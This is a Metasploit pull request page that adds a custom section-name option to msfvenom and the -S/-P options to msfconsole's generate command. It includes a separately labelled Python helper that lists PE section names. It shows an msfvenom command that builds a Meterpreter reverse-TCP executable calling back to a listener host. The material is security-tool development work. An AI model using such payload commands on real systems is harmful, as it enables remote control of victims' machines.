
Add opt --sec-name for msfvenom; Implement -S, -P for cmd dispatcher #11400

Merged: 5 commits merged on Feb 20, 2019

Conversation

@7043mcgeep (Contributor) commented Feb 13, 2019

Add option --sec-name <String> to msfvenom to give the user the ability to specify a custom section header name when generating (large) Windows binaries that require a new section to fit the payload. Resolves #6637

Implement --sec-name and --pad-nops for msfconsole command dispatcher (to use on a payload module directly).

To keep things clean, no console output was added/modified in these implementations (aside from option help menus).

msfvenom Verification

  • Run msfvenom with --sec-name option on the console.

Console Output

vader@deathstar:~/git/metasploit-framework$ ./msfvenom --sec-name pdata -p windows/meterpreter_reverse_tcp LHOST=10.10.10.11 -f exe -o /tmp/stageless8000.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 179779 bytes
Final size of exe file: 254976 bytes
Saved as: /tmp/stageless8000.exe

In the above example, the user specifies a new section header name "pdata" when generating a stageless payload with the default template.

To verify the section name was added to the PE, you can open the .exe in a PE viewer, such as CFF Explorer, as shown in this screenshot.

Command dispatcher verification

  • Run msfconsole and use a payload. Set necessary parameters.
  • Run generate on any payload module with options -S (section name) or -P (pad nops).

Here's an example of -P. Notice the diff output; 100 bytes is a result of the -S 100 option, automatically prepending (100-63=37) nops.

Here's an example of -S.

And here's proof that the above example command generate -S pdata -f exe -o secname-cmddispatch.exe generates the correct section header name: screenshot
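As an added verification helper (not code from this PR or from the Metasploit code base), the following Python reads a PE file's section table and lists its section names, so the result of --sec-name or generate -S can be checked from a script instead of a GUI PE viewer. The build_sample_pe function constructs a minimal, header-only PE purely as sample input; the DOS, COFF and section-header layouts follow the PE/COFF specification.

```python
import struct

# Offsets and sizes from the PE/COFF file format specification.
DOS_E_LFANEW_OFFSET = 0x3C
PE_SIGNATURE = b"PE\0\0"
COFF_HEADER_SIZE = 20
SECTION_HEADER_SIZE = 40


def pe_section_names(data: bytes) -> list:
    """Walk DOS header -> e_lfanew -> PE signature -> COFF header ->
    optional header -> section table and return each NUL-padded Name."""
    if len(data) < DOS_E_LFANEW_OFFSET + 4 or data[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", data, DOS_E_LFANEW_OFFSET)[0]
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]   # NumberOfSections
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]      # SizeOfOptionalHeader
    table = coff + COFF_HEADER_SIZE + opt_size
    names = []
    for i in range(num_sections):
        off = table + i * SECTION_HEADER_SIZE
        raw = data[off:off + 8]          # 8-byte Name field of the section header
        if len(raw) < 8:
            raise ValueError("section table truncated")
        names.append(raw.rstrip(b"\0").decode("ascii", errors="replace"))
    return names


def has_section(data: bytes, name: str) -> bool:
    """True if the image carries a section with exactly this name."""
    return name in pe_section_names(data)


def build_sample_pe(section_names: list) -> bytes:
    """Constructed minimal PE skeleton (DOS stub + COFF header + section
    table, no optional header or section data) used only as test input."""
    e_lfanew = 0x40
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, DOS_E_LFANEW_OFFSET, e_lfanew)
    # Machine=i386, NumberOfSections, timestamp, symtab ptr, nsyms, SizeOfOptionalHeader=0, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x102)
    sections = b"".join(
        struct.pack("<8sIIIIIIHHI", n.encode("ascii"), 0, 0, 0, 0, 0, 0, 0, 0, 0)
        for n in section_names
    )
    return bytes(dos) + PE_SIGNATURE + coff + sections
```

On a real msfvenom output, `pe_section_names(open("/tmp/stageless8000.exe", "rb").read())` should list the template's own sections plus the name passed to --sec-name.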

@busterb busterb self-assigned this Feb 15, 2019
@busterb busterb merged commit 53143d5 into rapid7:master Feb 20, 2019
@busterb (Member) commented Feb 20, 2019

Release Notes

This adds the ability for Metasploit payload generation to add a custom section header name for where to insert a generated payload in Windows executables. It also adds the ability to specify the pad-nops option from the generate command from within msfconsole.

@busterb (Member) commented Feb 20, 2019

Thanks for keeping at it @7043mcgeep!

@jmartin-tech (Contributor) commented

Marking msf5 since this builds on generator options changes in #8999.
